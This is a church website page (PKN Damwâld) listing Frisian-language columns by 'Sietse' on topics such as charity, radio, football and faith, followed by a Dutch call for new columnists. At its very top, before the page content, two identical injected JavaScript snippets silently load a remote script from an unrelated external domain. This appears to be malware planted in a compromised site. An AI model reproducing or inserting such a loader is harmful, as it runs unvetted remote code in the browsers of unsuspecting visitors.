;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Sietse - PKN Damwâld
Columnist Sietse
Columns van Sietse
“Niet alle aardbeien gaan naar de veiling” Gepubliceerd op: zaterdag 9 december 2023
Boppesteande is in útdrukking fan Gerrit Poels, de “broodpater van Tilburg”. Hast 30 jier lang gie dizze man alle nachten(!!) op paad yn Tilburg om minsken dy’t yn earmoed libben, bôle te bringen wat oerstallich wie by de bakker...
Prelude Gepubliceerd op: woensdag 23 augustus 2023
Sneintemoarns lústerje wy gauris nei Prelude, it fersyk-platen-programma fan Omrop Fryslân.  Tusken 8 en 9 oere bin der mear as 50.000 minsken dy’t  ôfstimd bin op de Omrop en lústerje nei allerhande geastlike muzyk, fan Leonard Cohen oan’t Ritske...
Arne Slot Gepubliceerd op: maandag 22 mei 2023
Fuotbalsupporters bin der yn ferskate soarten. Aktief nei it stadion gean alle twa wiken, en de thússupporters; sy folgje harren klup fia radio en tv. Sels ha’k ek faak nei Hearrefean west, mar nei ferrin fan tiid rekke de...
De blijmoedige gever……. Gepubliceerd op: maandag 13 maart 2023
Om in saak draaiende te hâlden mat der jild yn’t laatsje komme; in húshâlding, it bedriuw, mar ek de tsjerke kin der net sûnder! Net frjemd dus dat der koartlyn wêr rom omtinken wie foar de aksje Kerkbalans, it jierlikse...
Navigatie Gepubliceerd op: dinsdag 15 november 2022
As jo âlder wurde komt de fergelyking mei âlde auto’s wolris foarby; salang as it yn gebrûk is, is der neat oan’e hân, mar te lang stilstean is fúnest. Stiif en stram om wêr op gong te kommen is...
Restaurearje…….? Gepubliceerd op: maandag 11 juli 2022
Yn it tsjerkebledsje stie in bydrage oer û.o. it “samen op weg” proces;   De samenleving seculariseert, ofwol wurd “werelds”, mei om’t de tsjerken harren ynfloed ferlieze op de “samenleving”, dus ek yn Damwâld. Neffens de auteur mat we dêrom...
Oan de goede kant fan de doar…… Gepubliceerd op: zaterdag 9 april 2022
Samar in úspraak fan in man dy ’t ik trof op it wurk. Wij rekken oan de praat oer de bourkerij fan de man en it boer wêzen yn dizze tiid. In swier ûnderwerp fansels, want ja, eins bin...
In nij begjin mei….. Gepubliceerd op: vrijdag 7 januari 2022
              wat mear Wij……….en wat minder Ik wat mear waarmte yn ús mienskip…en wat minder saaklikens, wat mear  ”echte” kontakten……en wat minder “mail”-kontakten, wat mear lústerjen…..en wat minder ‘wij witte it wol’, wat...
O, kom uit de bedstee mijn liefste … Gepubliceerd op: vrijdag 15 oktober 2021
Dit ferske spilet mij wolris troch de holle, as it moarns nog wol noflik leit. En, sa lang as der net ien op jo wachtet is it ek neat net slim om wat langer te lizzen.   Mar sûnt de...
Corona, in flok, as in segen…. Gepubliceerd op: maandag 19 juli 2021
Om mar mei de doar yn hûs te fallen, foar my persoanlik is dizze tiid gjin flok, heechút lestich. Lykwols is it foar in soad oare lju in swiere tiid, en dan tink ik foaral oan de âlderein en...
Columnist worden?

Altijd al schrijver willen zijn, maar nooit de gelegenheid gekregen? In het bezit van sterke verhalen? Een uitgesproken mening? Een komische kijk op de zaken des levens? Een gouden pen ook toevallig? Grijp dan nu je kans!

Wordt columnist van onze werve(le-)nde kerkwebsite! Schrijf één keer in de 10 weken een column over een boeiend onderwerp. Dit kan van alles zijn, van Bijbelboek tot een gebeurtenis in onze tijd.

Neem contact op!